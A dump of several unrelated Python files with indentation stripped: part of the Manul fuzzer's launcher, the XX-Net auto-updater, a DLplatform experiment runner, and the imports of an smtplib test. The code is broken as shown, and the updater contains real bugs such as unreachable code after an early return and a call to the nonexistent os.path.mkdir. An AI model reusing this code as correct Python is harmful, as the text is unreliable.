new_coverage_file_name = self.generate_new_name(file_name)
INFO(1, None, self.log_file, "Copying %s to %s" % (full_output_file_path,
self.queue_path + "/" + new_coverage_file_name))
shutil.copy(full_output_file_path, self.queue_path + "/" + new_coverage_file_name)
new_files.append((1, new_coverage_file_name))
# for each new file assign new AFLFuzzer
self.afl_fuzzer[new_coverage_file_name] = afl_fuzz.AFLFuzzer(self.token_dict, self.queue_path,
new_coverage_file_name)
self.prev_hashes[new_coverage_file_name] = None
self.update_stats()
self.sync_bitmap()
if len(new_files) > 0:
self.list_of_files = self.list_of_files + new_files
self.fuzzer_stats.stats['files_in_queue'] = len(self.list_of_files)
self.update_stats()
end_time = timer() - start_time
self.fuzzer_stats.stats['exec_per_sec'] = self.fuzzer_stats.stats['executions'] / end_time
self.avg_exec_per_sec += int(self.fuzzer_stats.stats['exec_per_sec'] / cycle_id)
self.avg_bitmap_size += int(self.bitmap_size / cycle_id)
last_stats_saved_time += elapsed
if last_stats_saved_time > 1: # we save fuzzer stats per iteration or once per second to avoid huge stats files
self.save_stats()
last_stats_saved_time = 0
def get_bytes_covered(virgin_bits):
non_zeros = [x for x in virgin_bits if x != 0xFF]
return len(non_zeros)
def run_fuzzer_instance(files_list, i, virgin_bits, args, stats_array, restore_session,
crash_bits, dbi_setup, radamsa_path):
signal.signal(signal.SIGINT, signal.SIG_IGN)
printing.DEBUG_PRINT = args.debug # FYI, multiprocessing causes global vars to be reinitialized.
INFO(0, None, None, "Starting fuzzer %d" % i)
fuzzer_instance = Fuzzer(files_list, i, virgin_bits, args, stats_array, restore_session,
crash_bits, dbi_setup, radamsa_path)
fuzzer_instance.run() # never return
def check_instrumentation(target_binary):
with open(target_binary, 'rb') as f:
s = f.read()
res = s.find(b"__AFL_SHM_ID")
if res == -1:
return False
return True
def which(target_binary):
def is_binary(target_binary):
return os.path.isfile(target_binary) and os.access(target_binary, os.X_OK)
fpath, fname = os.path.split(target_binary)
if fpath:
if is_binary(target_binary):
return target_binary
else:
for path in os.environ["PATH"].split(os.pathsep):
exec_file = os.path.join(path, target_binary)
if is_binary(exec_file):
return exec_file
return None
def check_binary(target_binary):
binary_path = which(target_binary)
if binary_path is None:
ERROR("Unable to find binary %s (required)" % target_binary)
def get_available_id_for_backup(dir_name):
id = 0
tmp = dir_name + "_%d" % id
while True:
if not os.path.exists(tmp):
return id
id += 1
tmp = dir_name + "_%d" % id
def configure_dbi(args, target_binary, is_debug):
dbi_engine_path = args.dbi_root
dbi_tool_path = args.dbi_client_root
dbi_tool_libs = args.dbi_client_libs
if dbi_engine_path is None or dbi_tool_path is None:
ERROR("DBI_ROOT and/or DBI_CLIENT_ROOT paths not specified, unable to execute manul")
check_binary(dbi_engine_path)
check_binary(dbi_tool_path)
dbi_tool_params = ""
dbi_pipe_handler = None
if args.dbi == "dynamorio":
if args.dbi_persistence_mode >= 1:
if args.dbi_target_module:
dbi_tool_params += "-target_module %s " % args.dbi_target_module
if args.dbi_thread_coverage:
dbi_tool_params += "-thread_coverage"
if args.dbi_target_method:
dbi_tool_params += "-target_method %s " % args.dbi_target_method
elif args.dbi_target_offset:
dbi_tool_params += "-target_offset %s " % args.dbi_target_offset
else:
ERROR("Please specify target method or target offset in manul.config")
dbi_tool_params += "-fuzz_iterations %d " % args.dbi_fuzz_iterations
dbi_tool_params += "-persistence_mode %d " % args.dbi_persistence_mode
dbi_tool_params += "-coverage_module %s " % ntpath.basename(target_binary)
if dbi_tool_libs is not None:
for target_lib in dbi_tool_libs.split(","):
if target_lib == "":
continue
dbi_tool_params += "-coverage_module %s " % target_lib
if is_debug:
dbi_tool_params += "-debug_manul "
elif args.dbi == "pin":
if sys.platform == "win32":
ERROR("Intel PIN DBI engine is not supported on Windows")
if dbi_tool_libs is not None:
# adding desired libs to instrument
fd = open("dbi_config", 'w')
fd.write(dbi_tool_libs)
fd.close()
dbi_config_file_path = os.path.abspath("dbi_config")
dbi_tool_params += " -libs %s" % dbi_config_file_path
else:
ERROR("Unknown dbi engine/option specified. Intel PIN or DynamoRIO are only supported")
dbi_setup = (dbi_engine_path, dbi_tool_path, dbi_tool_params, dbi_pipe_handler)
return dbi_setup
def split_files_by_count(files_list, threads_count):
# split list of input files by fuzzer instances
less_files = False
if len(files_list) < threads_count:
less_files = True
WARNING(None, "Too many fuzzing instances for %d files, same files will be mutated with different seeds" % len(files_list))
files = [[] for x in xrange(threads_count)]
thread_index = 0
# if list of files is less than number of required threads we run our fuzzer with different seed on the same files
while thread_index < threads_count:
for i, file_name in enumerate(files_list):
if less_files and (thread_index + i) >= threads_count:
break
piece = (thread_index + i) % threads_count
files[piece].append(file_name)
thread_index += i + 1
return files
def get_files_list(path):
files_list = [f for f in listdir(path) if isfile(join(path, f))] # let's process input directory
files_list.sort()
if len(files_list) == 0:
ERROR("No files for fuzzing, exiting")
return files_list
def check_if_exist(files_list, path):
for file_name in files_list:
if file_name == "":
ERROR("File list has empty file name")
elif isfile(path + "/" + file_name):
continue
else:
ERROR("File %s doesn't exist in %s" % (file_name, path))
def allocate_files_per_jobs(args):
if args.net_config_slave is not None:
files = manul_network.get_files_list_from_master(args.net_config_slave, args.nfuzzers) # ask master to provide list of files
check_if_exist(files, args.input)
return split_files_by_count(files, args.nfuzzers)
files_list = get_files_list(args.input)
if args.net_config_master is not None:
ips = manul_network.get_slaves_ips(args.net_config_master)
slaves, total_threads_count = manul_network.get_remote_threads_count(ips) # ask slaves count and threads
total_threads_count += args.nfuzzers
files = split_files_by_count(files_list, total_threads_count)
piece_id = 0
for ip, port, slave_threads_count in slaves:
manul_network.send_files_list(ip, port, files[piece_id:slave_threads_count + piece_id]) # send them files list
piece_id += slave_threads_count
files = files[piece_id:]
else:
files = split_files_by_count(files_list, args.nfuzzers)
return files
def enable_network_config(args):
if (args.target_ip_port and not args.target_protocol) or (args.target_protocol and not args.target_ip_port):
ERROR("Both target_ip_port and target_protocol should be specified")
if args.target_ip_port and not args.target_protocol:
ERROR("You need to provide target protocol (tcp or udp) in manul config along with ip and port")
if args.target_protocol and not args.target_ip_port:
ERROR("You need to provide target port and ip along with TCP/IP protocol in manul config")
if args.target_protocol and args.target_protocol != "tcp" and args.target_protocol != "udp":
ERROR("Invalid protocol. Should be tcp or udp.")
if args.target_ip_port and args.nfuzzers > 1:
ERROR("Multi-threaded network fuzzing is not supported, yet")
if args.target_ip_port:
target_ip_port = args.target_ip_port.split(":")
if len(target_ip_port) != 2:
ERROR("Invalid format for IP:PORT in manul config, received this: %s" % args.target_ip_port)
target_ip = target_ip_port[0]
if target_ip.count(".") != 3:
ERROR("Invalid IP format in %s" % target_ip)
target_port = target_ip_port[1]
if int(target_port) > 65535 or int(target_port) <= 0:
ERROR("Target port should be in range (0, 65535)")
def parse_args():
global INIT_WAIT_TIME
parser = argparse.ArgumentParser(prog = "manul.py",
description = 'Manul - coverage-guided parallel fuzzing for native applications.',
usage = '%(prog)s -i /home/user/inputs_dir -o /home/user/outputs_dir -n 40 "target -png @@"')
requiredNamed = parser.add_argument_group('Required parameters')
requiredNamed.add_argument('-i', required=True, dest='input', help = "Path to directory with initial corpus")
requiredNamed.add_argument('-o', dest='output', required=True, default="manul_output",
help = "Path to output directory")
parser.add_argument('-n', default=1, type=int, dest='nfuzzers', help = "Number of parallel fuzzers")
parser.add_argument('-s', default=False, action='store_true', dest="simple_mode",
help = "Run dumb fuzzing (no code instrumentation)")
parser.add_argument('-c', default="manul.config", dest = "config",
help = "Path to config file with additional options (see manul.config)")
parser.add_argument('-r', default=False, action='store_true', dest = "restore", help = "Restore previous session")
# these options should be specified through config file and hidden
parser.add_argument('--deterministic_seed', default=False, action='store_true', help = argparse.SUPPRESS)
parser.add_argument('--print_per_thread', default=False, action='store_true', dest="threads_info", help = argparse.SUPPRESS)
parser.add_argument('--dbi', default = None, help = argparse.SUPPRESS)
parser.add_argument('--dbi_root', help = argparse.SUPPRESS)
parser.add_argument('--dbi_client_root', help = argparse.SUPPRESS)
parser.add_argument('--dbi_client_libs', help = argparse.SUPPRESS)
parser.add_argument("--dbi_persistence_mode", default = 0, type=int, help = argparse.SUPPRESS)
parser.add_argument("--dbi_target_method", default = None, help = argparse.SUPPRESS)
parser.add_argument("--dbi_target_offset", default = None, help= argparse.SUPPRESS)
parser.add_argument("--dbi_target_module", default = None, help = argparse.SUPPRESS)
parser.add_argument("--dbi_fuzz_iterations", default = 5000, type=int, help = argparse.SUPPRESS)
parser.add_argument("--dbi_thread_coverage", default = False, action = 'store_true', help = argparse.SUPPRESS)
parser.add_argument('--timeout', default=10, type=int, help = argparse.SUPPRESS)
parser.add_argument('--net_config_master', help = argparse.SUPPRESS)
parser.add_argument('--net_config_slave', help = argparse.SUPPRESS)
parser.add_argument('--debug', default=False, action='store_true', help = argparse.SUPPRESS)
parser.add_argument('--manul_logo', default=False, action='store_true', help = argparse.SUPPRESS)
parser.add_argument('--logging_enable', default=False, action='store_true', help = argparse.SUPPRESS)
parser.add_argument('--sync_freq', default=1000000, type=int, help = argparse.SUPPRESS)
parser.add_argument('--cmd_fuzzing', default=False, action='store_true', help = argparse.SUPPRESS)
parser.add_argument('--target_ip_port', default = None, help = argparse.SUPPRESS)
parser.add_argument('--target_protocol', default = None, help = argparse.SUPPRESS)
parser.add_argument('--mutator_weights', default = None, help = argparse.SUPPRESS)
parser.add_argument('--user_signals', default = None, help = argparse.SUPPRESS)
parser.add_argument("--dict", default = None, help = argparse.SUPPRESS)
parser.add_argument("--restore", default = None, action = 'store_true', help = argparse.SUPPRESS)
parser.add_argument("--no_stats", default = None, action = "store_true", help = argparse.SUPPRESS)
parser.add_argument("--custom_path", default = None, help=argparse.SUPPRESS)
parser.add_argument("--init_wait", default = 0.0, help = argparse.SUPPRESS)
parser.add_argument("--net_sleep_between_cases", default = 0.0, help = argparse.SUPPRESS)
parser.add_argument("--disable_volatile_bytes", default = None, action = 'store_true', help = argparse.SUPPRESS)
parser.add_argument("--stop_after_nseconds", default = 0.0, type=int, help = argparse.SUPPRESS)
parser.add_argument("--forkserver_on", default = False, action = 'store_true', help = argparse.SUPPRESS)
parser.add_argument("--skip_binary_check", default = False, action = 'store_true', help = argparse.SUPPRESS)
parser.add_argument('target_binary', nargs='*', help="The target binary and options to be executed (quotes needed e.g. \"target -png @@\")")
args = parser.parse_args()
additional_args = parse_config(args.config)
# A little hack here. We actually adding commands from config to cmd string and then parse it all together.
final_cmd_to_parse = "%s %s" % (" ".join(sys.argv[1:-1]), additional_args)
final_cmd_to_parse = final_cmd_to_parse.split(" ")
final_cmd_to_parse.append("%s" % sys.argv[-1])
args = parser.parse_args(final_cmd_to_parse)
if args.manul_logo:
printing.print_logo()
if not args.target_ip_port and "@@" not in args.target_binary[0]:
ERROR("Your forgot to specify @@ for your target. Call manul.py -h for more details")
if args.simple_mode and args.dbi is not None:
ERROR("Options mismatch. Simple mode can't be executed with DBI mode together (check manul.config).")
if not args.mutator_weights:
ERROR("At least one mutator should be specified")
if args.custom_path and not os.path.isdir(args.custom_path):
ERROR("Custom path provided does not exist or not a directory")
enable_network_config(args)
if args.dict:
if not os.path.isfile(args.dict):
WARNING(None, "Unable to read dictionary file from %s, file doesn't exist" % args.dict)
if args.forkserver_on and not sys.platform.startswith('linux'):
INFO(0, None, None, "Forkserver is not supported on this platform, switching to classic mode")
args.forkserver_on = False
if args.simple_mode or args.dbi:
args.forkserver_on = False # we don't have forkserver for simple or DBI modes
#TODO: check that DBI params are correctly set
INIT_WAIT_TIME = float(args.init_wait)
return args
if __name__ == "__main__":
start = timer()
args = parse_args()
printing.DEBUG_PRINT = args.debug
binary_to_check = args.target_binary[0]
target_binary = split_unescape(binary_to_check, ' ', '\\')[0]
dbi_setup = None
if args.dbi is not None:
dbi_setup = configure_dbi(args, target_binary, args.debug)
if not args.skip_binary_check:
check_binary(target_binary) # check if our binary exists and is actually instrumented
if not args.simple_mode and args.dbi is None and not args.skip_binary_check and not check_instrumentation(target_binary):
ERROR("Failed to find afl's instrumentation in the target binary, try to recompile or run manul in dumb mode")
if not os.path.isdir(args.input):
ERROR("Input directory doesn't exist")
if not os.path.isdir(args.output):
ERROR("Output directory doesn't exist")
if args.output.endswith('/'):
args.output = args.output[:-1]
if args.input.endswith('/'):
args.input = args.input[:-1]
if not args.restore and os.listdir(args.output):
WARNING(None, "Output directory is not empty, creating backup of output folder")
id = get_available_id_for_backup(args.output)
os.rename(args.output, args.output + "_%d" % id)
os.mkdir(args.output)
INFO(0, None, None, "Done")
# if radamsa weight is not zero, check that we can actually execute it
radamsa_path = None
if "radamsa:0" not in args.mutator_weights:
#get relative path to radamsa binary
radamsa_path = __file__
radamsa_path = radamsa_path.replace("manul.py", "")
if sys.platform == "win32":
radamsa_path = radamsa_path + "radamsa.exe"
elif sys.platform == "darwin":
radamsa_path = "radamsa"
else:
radamsa_path = radamsa_path + "./libradamsa/libradamsa.so"
INFO(1, None, None, "Full relative path to radamsa %s" % radamsa_path)
check_binary(radamsa_path)
files = allocate_files_per_jobs(args)
virgin_bits = None
crash_bits = None
if not args.simple_mode:
virgin_bits = multiprocessing.Array("i", SHM_SIZE)
crash_bits = multiprocessing.Array("i", SHM_SIZE)
for i in range(0, SHM_SIZE):
virgin_bits[i] = 255 # initializing with all 0xFFs
crash_bits[i] = 255
# allocating data structures where we store all statistics about our fuzzers
stats = FuzzerStats()
all_threads_stats = list()
all_threads_handles = list()
for i, files_piece in enumerate(files):
stats_array = multiprocessing.Array("d", stats.get_len())
t = multiprocessing.Process(target=run_fuzzer_instance, args=(files_piece, i, virgin_bits, args, stats_array,
args.restore, crash_bits, dbi_setup, radamsa_path))
t.start()
all_threads_stats.append(stats_array)
all_threads_handles.append(t)
INFO(0, None, None, "%d fuzzer instances successfully launched" % args.nfuzzers)
sync_t = None
if (args.net_config_slave is not None or args.net_config_master is not None) and not args.simple_mode:
INFO(1, None, None, "Allocating special thread for bitmap synchronization")
ips = None
if args.net_config_master is not None:
ips = manul_network.get_slaves_ips(args.net_config_master)
sync_t = threading.Thread(target=manul_network.sync_remote_bitmaps,
args=(virgin_bits, ips))
elif args.net_config_slave is not None:
sync_t = threading.Thread(target=manul_network.receive_bitmap_slave,
args=(args.net_config_slave, virgin_bits))
sync_t.setDaemon(True)
sync_t.start()
if not PY3 and not args.target_ip_port and not args.forkserver_on:
watchdog_t = threading.Thread(target=watchdog, args=(args.timeout,))
watchdog_t.setDaemon(True)
watchdog_t.start()
try:
while True:
threads_inactive = 0
for i, t in enumerate(all_threads_handles):
if not t.is_alive():
threads_inactive += 1
WARNING(None, "Fuzzer %d unexpectedly terminated" % i)
if sync_t is not None and not sync_t.alive():
WARNING(None, "Synchronization thread is not alive")
end = timer() - start
bytes_cov = 0.0
if not args.simple_mode:
bytes_cov = get_bytes_covered(virgin_bits)
active_threads_count = len(all_threads_handles) - threads_inactive
# printing statistics
if args.threads_info:
printing.print_per_thread(all_threads_stats, bytes_cov, end, active_threads_count, args, args.mutator_weights)
else:
printing.print_summary(all_threads_stats, bytes_cov, end, active_threads_count, args, UPDATE, args.mutator_weights)
if args.stop_after_nseconds != 0.0 and args.stop_after_nseconds < end:
INFO(0, None, None, "Stopping manul due to stop_after_nseconds option %d" % end)
#kill_all(os.getpid())
sys.exit(0)
time.sleep(STATS_FREQUENCY)
except (KeyboardInterrupt, SystemExit):
INFO(0, None, None, "Stopping all fuzzers and threads")
kill_all(os.getpid())
# TODO: ideally, if we have UDS opened we should clean them with unlink() function here.
INFO(0, None, None, "Stopped, exiting")
sys.exit()
|
update.py
|
#!/usr/bin/env python
# coding:utf-8
import os
import urllib2
import json
import time
import threading
import zipfile
import sys
import platform
from distutils.version import LooseVersion
from instances import xlog
import config
import uuid
import update_from_github
#opener = urllib2.build_opener()
#update_url = "http://127.0.0.1:8080/update.json"
update_url = "https://xxnet-update.appspot.com/update.json"
update_content = ""
update_dict = {}
new_gae_proxy_version = ""
gae_proxy_path = ""
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath( os.path.join(current_path, os.pardir))
data_root = os.path.join(root_path, 'data')
def get_opener():
autoproxy = '127.0.0.1:8087'
import ssl
if getattr(ssl, "create_default_context", None):
cafile = os.path.join(data_root, "gae_proxy", "CA.crt")
if not os.path.isfile(cafile):
cafile = None
context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH,
cafile=cafile)
https_handler = urllib2.HTTPSHandler(context=context)
opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}), https_handler)
else:
opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}))
return opener
def version_to_bin(s):
return reduce(lambda a, b: a << 8 | b, map(int, s.split(".")))
def download_file(url, file):
try:
xlog.info("download %s to %s", url, file)
opener = get_opener()
req = opener.open(url, cafile="")
CHUNK = 16 * 1024
with open(file, 'wb') as fp:
while True:
chunk = req.read(CHUNK)
if not chunk: break
fp.write(chunk)
return True
except:
xlog.info("download %s to %s fail", url, file)
return False
def sha1_file(filename):
import hashlib
BLOCKSIZE = 65536
hasher = hashlib.sha1()
try:
with open(filename, 'rb') as afile:
buf = afile.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = afile.read(BLOCKSIZE)
return hasher.hexdigest()
except:
return False
def install_module(module, new_version):
import module_init
import os, subprocess, sys
current_path = os.path.dirname(os.path.abspath(__file__))
new_module_version_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, module, new_version))
#check path exist
if not os.path.isdir(new_module_version_path):
xlog.error("install module %s dir %s not exist", module, new_module_version_path)
return
#call setup.py
setup_script = os.path.join(new_module_version_path, "setup.py")
if not os.path.isfile(setup_script):
xlog.warn("update %s fail. setup script %s not exist", module, setup_script)
return
config.set(["modules", module, "current_version"], str(new_version))
config.save()
if module == "launcher":
module_init.stop_all()
import web_control
web_control.stop()
subprocess.Popen([sys.executable, setup_script], shell=False)
os._exit(0)
else:
xlog.info("Setup %s version %s ...", module, new_version)
try:
module_init.stop(module)
subprocess.call([sys.executable, setup_script], shell=False)
xlog.info("Finished new version setup.")
xlog.info("Restarting new version ...")
module_init.start(module)
except Exception as e:
xlog.error("install module %s %s fail:%s", module, new_version, e)
def download_module(module, new_version):
import os
global update_content, update_dict
current_path = os.path.dirname(os.path.abspath(__file__))
download_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, 'data', 'downloads'))
if not os.path.isdir(download_path):
os.mkdir(download_path)
try:
for source in update_dict["modules"][module]["versions"][new_version]["sources"]:
url = source["url"]
filename = module + "-" + new_version + ".zip"
file_path = os.path.join(download_path, filename)
if os.path.isfile(file_path) and sha1_file(file_path) == update_dict["modules"][module]["versions"][new_version]["sha1"]:
pass
elif not download_file(url, file_path):
xlog.warn("download %s fail", url)
continue
sha1 = sha1_file(file_path)
if update_dict["modules"][module]["versions"][new_version]["sha1"] != sha1:
xlog.warn("download %s sha1 wrong", url)
continue
module_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, module))
if not os.path.isdir(module_path):
os.path.mkdir(module_path, "755")
version_path = os.path.join(module_path, new_version)
if os.path.isdir(version_path):
xlog.error("module dir exist:%s, download exist.", version_path)
return
with zipfile.ZipFile(file_path, "r") as dz:
dz.extractall(module_path)
dz.close()
import shutil
unzip_path = os.path.abspath(os.path.join(module_path, module + "-" + new_version))
tag_path = os.path.abspath(os.path.join(module_path, new_version))
shutil.move(unzip_path, tag_path)
msg = "Module %s new version %s downloaded, Install?" % (module, new_version)
if sys.platform == "linux" or sys.platform == "linux2":
from gtk_tray import sys_tray
data_install = "%s|%s|install" % (module, new_version)
data_ignore = "%s|%s|ignore" % (module, new_version)
buttons = {1: {"data":data_install, "label":"Install", 'callback':general_gtk_callback},
2: {"data":data_ignore, "label":"Ignore", 'callback':general_gtk_callback}}
sys_tray.notify_general(msg=msg, title="Install", buttons=buttons)
elif sys.platform == "win32":
from win_tray import sys_tray
if sys_tray.dialog_yes_no(msg, u"Install", None, None) == 1:
install_module(module, new_version)
else:
ignore_module(module, new_version)
elif sys.platform == "darwin":
from mac_tray import sys_tray
if sys_tray.presentAlert_withTitle_(msg, "Install"):
install_module(module, new_version)
else:
ignore_module(module, new_version)
else:
install_module(module, new_version)
break
except Exception as e:
xlog.warn("get gae_proxy source fail, content:%s err:%s", update_content, e)
def ignore_module(module, new_version):
config.set(["modules", module, "ignore_version"], str(new_version))
config.save()
def general_gtk_callback(widget=None, data=None):
args = data.split('|')
if len(args) != 3:
xlog.error("general_gtk_callback data:%s", data)
return
module = args[0]
new_version = args[1]
action = args[2]
if action == "download":
download_module(module, new_version)
elif action == "install":
install_module(module, new_version)
elif action == "ignore":
ignore_module(module, new_version)
def check_update():
try:
update_rule = config.get(["update", "check_update"], "stable")
if update_rule == "dont-check":
return
check_push_update()
if update_rule != "stable" and update_rule != "test":
return
versions = update_from_github.get_github_versions()
current_version = update_from_github.current_version()
if update_rule == "test":
if LooseVersion(current_version) < LooseVersion(versions[0][1]):
xlog.info("update to test version %s", versions[0][1])
update_from_github.update_version(versions[0][1])
elif update_rule == "stable":
if LooseVersion(current_version) < LooseVersion(versions[1][1]):
xlog.info("update to stable version %s", versions[1][1])
update_from_github.update_version(versions[1][1])
except IOError as e:
xlog.warn("check update fail:%r", e)
except Exception as e:
xlog.exception("check_update fail:%r", e)
def check_push_update():
global update_content, update_dict
try:
opener = get_opener()
req_url = update_url + "?uuid=" + get_uuid() \
+ "&version=" + update_from_github.current_version() \
+ "&platform=" + platform.platform()
try:
update_content = opener.open(req_url).read()
except Exception as e:
xlog.warn("check_update fail:%r", e)
return False
update_dict = json.loads(update_content)
return True
for module in update_dict["modules"]:
new_version = str(update_dict["modules"][module]["last_version"])
describe = update_dict["modules"][module]["versions"][new_version]["describe"]
if update_dict["modules"][module]["versions"][new_version]["notify"] != "true":
continue
if not module in config.config["modules"]:
ignore_version = 0
current_version = 0
config.config["modules"][module] = {}
config.config["modules"][module]["current_version"] = '0.0.0'
else:
current_version = config.get(["modules", module, "current_version"])
if "ignore_version" in config.config["modules"][module]:
ignore_version = config.config["modules"][module]["ignore_version"]
else:
ignore_version = current_version
if version_to_bin(new_version) <= version_to_bin(ignore_version):
continue
if version_to_bin(new_version) > version_to_bin(current_version):
xlog.info("new %s version:%s", module, new_version)
if sys.platform == "linux" or sys.platform == "linux2":
from gtk_tray import sys_tray
msg = "Module %s new version: %s, Download?\nNew:%s" % (module, new_version, describe)
data_download = "%s|%s|download" % (module, new_version)
data_ignore = "%s|%s|ignore" % (module, new_version)
buttons = {1: {"data":data_download, "label":"Download", 'callback':general_gtk_callback},
2: {"data":data_ignore, "label":"Ignore", 'callback':general_gtk_callback}}
sys_tray.notify_general(msg=msg, title="New Version", buttons=buttons)
elif sys.platform == "win32":
from win_tray import sys_tray
msg = "Module %s new version: %s, Download?" % (module, new_version)
if sys_tray.dialog_yes_no(msg, u"Download", None, None) == 1:
download_module(module, new_version)
else:
ignore_module(module, new_version)
elif sys.platform == "darwin":
from mac_tray import sys_tray
msg = "Module %s new version: %s, Download?" % (module, new_version)
if sys_tray.presentAlert_withTitle_(msg, "Download"):
download_module(module, new_version)
else:
ignore_module(module, new_version)
else:
download_module(module, new_version)
except Exception as e:
xlog.exception("check_update except:%s", e)
return
def create_desktop_shortcut():
import sys
if sys.platform.startswith("linux"):
pass
elif sys.platform == "win32":
# import ctypes
# msg = u"是否在桌面创建图标?"
# title = u"XX-Net 叉叉网"
#res = ctypes.windll.user32.MessageBoxW(None, msg, title, 1)
# Yes:1 No:2
#if res == 2:
# return
work_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(work_path)
import subprocess
subprocess.call(["Wscript.exe", "//E:JScript", "create_shortcut.js"], shell=False)
def notify_install_tcpz_for_winXp():
import ctypes
ctypes.windll.user32.MessageBoxW(None, u"请使用tcp-z对 tcpip.sys 打补丁,解决链接并发限制!", u"Patch XP needed", 0)
def check_new_machine():
current_path = os.path.dirname(os.path.abspath(__file__))
if current_path != config.get(["update", "last_path"], ""):
config.set(["update", "last_path"], current_path)
config.save()
if sys.platform == "win32" and platform.release() == "XP":
notify_install_tcpz_for_winXp()
xlog.info("generate desktop shortcut")
create_desktop_shortcut()
def check_loop():
check_new_machine()
#wait gae_proxy to start
#update need gae_proxy as proxy
time.sleep(1)
while True:
check_update()
time.sleep(3600 * 24)
def start():
p = threading.Thread(target=check_loop)
p.setDaemon(True)
p.start()
def need_new_uuid():
if not config.get(["update", "uuid"]):
xlog.info("need_new_uuid: uuid is empty")
return True
return False
def generate_new_uuid():
xx_net_uuid = str(uuid.uuid4())
config.set(["update", "uuid"], xx_net_uuid)
xlog.info("generate uuid:%s", xx_net_uuid)
config.save()
def get_uuid():
if need_new_uuid():
generate_new_uuid()
xx_net_uuid = config.get(["update", "uuid"])
xlog.info("get uuid:%s", xx_net_uuid)
return xx_net_uuid
if __name__ == "__main__":
#get_uuid()
#check_update()
#sys_tray.serve_forever()
create_desktop_shortcut()
|
experiment.py
|
from multiprocessing import Process
from DLplatform.coordinator import Coordinator, InitializationHandler
from DLplatform.worker import Worker
from DLplatform.communicating import Communicator, RabbitMQComm
from DLplatform.dataprovisioning import IntervalDataScheduler
from DLplatform.learningLogger import LearningLogger
from DLplatform.learning import LearnerFactory
import time
import os
import pickle
import numpy as np
import math
import subprocess
class Experiment():
def __init__(self, executionMode, messengerHost, messengerPort, numberOfNodes, sync, aggregator, learnerFactory, dataSourceFactory, stoppingCriterion, initHandler = InitializationHandler(), sleepTime = 5):
self.executionMode = executionMode
if executionMode == 'cpu':
self.devices = None
self.modelsPer = None
else:
self.devices = []
if os.environ.get('CUDA_VISIBLE_DEVICES') is None:
gpuIds = range(str(subprocess.check_output(["nvidia-smi", "-L"])).count('UUID'))
else:
gpuIds = os.environ.get('CUDA_VISIBLE_DEVICES').split(',')
for taskid in gpuIds:
self.devices.append('cuda:' + str(taskid))
self.modelsPer = math.ceil(numberOfNodes * 1.0 / len(self.devices))
print(self.modelsPer, "models per gpu on", ','.join(self.devices))
self.messengerHost = messengerHost
self.messengerPort = messengerPort
self.numberOfNodes = numberOfNodes
self.sync = sync
self.aggregator = aggregator
self.learnerFactory = learnerFactory
self.dataSourceFactory = dataSourceFactory
self.stoppingCriterion = stoppingCriterion
self.initHandler = initHandler
self._uniqueId = str(os.getpid())
self.sleepTime = sleepTime
def run(self, name):
self.start_time = time.time()
exp_path = name + "_" + self.getTimestamp()
os.mkdir(exp_path)
self.writeExperimentSummary(exp_path, name)
t = Process(target = self.createCoordinator, args=(exp_path, ), name = 'coordinator')
#t.daemon = True
t.start()
jobs = [t]
time.sleep(self.sleepTime)
for taskid in range(self.numberOfNodes):
t = Process(target = self.createWorker, args=(taskid, exp_path, self.executionMode, self.devices, self.modelsPer, ), name = "worker_" + str(taskid))
#t.daemon = True
t.start()
jobs.append(t)
time.sleep(self.sleepTime)
for job in jobs:
job.join()
print('experiment done.')
def createCoordinator(self, exp_path):
coordinator = Coordinator()
coordinator.setInitHandler(self.initHandler)
comm = RabbitMQComm(hostname = self.messengerHost, port = self.messengerPort, user = 'guest', password = 'guest', uniqueId = self._uniqueId)
os.mkdir(os.path.join(exp_path,'coordinator'))
commLogger = LearningLogger(path=os.path.join(exp_path,'coordinator'), id="communication", level = 'INFO')
comm.setLearningLogger(commLogger)
coordinator.setCommunicator(comm)
self.sync.setAggregator(self.aggregator)
coordinator.setSynchronizer(self.sync)
logger = LearningLogger(path=exp_path, id="coordinator", level = 'INFO')
coordinator.setLearningLogger(logger)
print("Starting coordinator...\n")
coordinator.run()
def createWorker(self, id, exp_path, executionMode, devices, modelsPer):
print("start creating worker" + str(id))
if executionMode == 'cpu':
device = None
else:
print("device for node", id, "is gpu", id//modelsPer)
device = devices[id//modelsPer]
nodeId = str(id)
w = Worker(nodeId)
dataScheduler = IntervalDataScheduler()
dataSource = self.dataSourceFactory.getDataSource(nodeId = id)
dataScheduler.setDataSource(source = dataSource)
w.setDataScheduler(dataScheduler)
comm = RabbitMQComm(hostname = self.messengerHost, port = self.messengerPort, user = 'guest', password = 'guest', uniqueId = self._uniqueId)
os.mkdir(os.path.join(exp_path,"worker" + str(id)))
commLogger = LearningLogger(path=os.path.join(exp_path,"worker" + str(id)), id="communication", level = 'INFO')
comm.setLearningLogger(commLogger)
w.setCommunicator(comm)
logger = LearningLogger(path=exp_path, id="worker" + str(id), level = 'INFO')
learner = self.learnerFactory.getLearnerOnDevice(executionMode, device)
learner.setLearningLogger(logger)
learner.setStoppingCriterion(self.stoppingCriterion)
self.sync.setAggregator(self.aggregator)
learner.setSynchronizer(self.sync)
w.setLearner(learner)
print("create worker " + nodeId + "\n")
w.run()
def getTimestamp(self):
return time.strftime("%Y-%m-%d_%H-%M-%S", time.localtime(time.time()))
def writeExperimentSummary(self, path, name):
outString = "Experiment " + name + " Summary:\n\n"
outString += "Start:\t" + str(self.start_time) + "\n"
outString += "Number of Nodes:\t"+str(self.numberOfNodes)+"\n"
outString += "Learner:\t\t\t"+str(self.learnerFactory)+"\n"
outString += "Data source:\t\t"+str(self.dataSourceFactory)+"\n"
outString += "Sync:\t\t\t"+str(self.sync)+"\n"
outString += "Aggregator:\t\t"+str(self.aggregator)+"\n"
outString += "Stopping criterion:\t"+str(self.stoppingCriterion)+"\n"
outString += "Messenger Host:\t\t"+str(self.messengerHost)+"\n"
outString += "Messenger Port:\t\t"+str(self.messengerPort)+"\n"
summaryFile = os.path.join(path, "summary.txt")
f = open(summaryFile, 'w')
f.write(outString)
f.close()
|
test_smtplib.py
|
import asyncore
import email.mime.text
import email.utils
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import unittest
from test import support, mock_socket
try:
import threading
except ImportError:
threading = None
